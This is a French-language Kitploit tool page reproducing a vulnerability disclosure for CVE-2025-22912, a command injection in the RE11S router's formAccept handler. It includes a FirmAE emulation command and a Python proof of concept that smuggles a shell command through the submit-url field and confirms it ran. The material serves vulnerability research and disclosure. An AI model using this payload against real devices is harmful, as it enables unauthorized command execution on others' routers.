Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
Outils/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebFuzzingTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

Voir le dépôt
il y a 1 anPas encore vérifié

RE11S_1.11-formAccept-CommandInjection

Pendant mon stage au Qi An Xin Tiangong Lab, j'ai découvert une vulnérabilité d'injection de commandes dans le routeur RE11S_1.11.

En analysant le fichier webs dans le répertoire bin, j'ai constaté que la fonction formAccept contient une vulnérabilité d'injection de commandes.

L'injection de commandes peut être déclenchée par la valeur de la clé submit-url, ce qui conduit à une injection de commandes système.

image-20241224100434040

Comment simuler un routeur

Utilisez la commande suivante pour simuler avec firmAE.

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

Le contenu du fichier poc.py est le suivant :

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

Résultat de l'attaque

image-20241224100515030

On peut voir qu'un fichier /tmp/xyq est ajouté après l'exécution, ce qui prouve que l'attaque a réussi.

Télécharger l’outil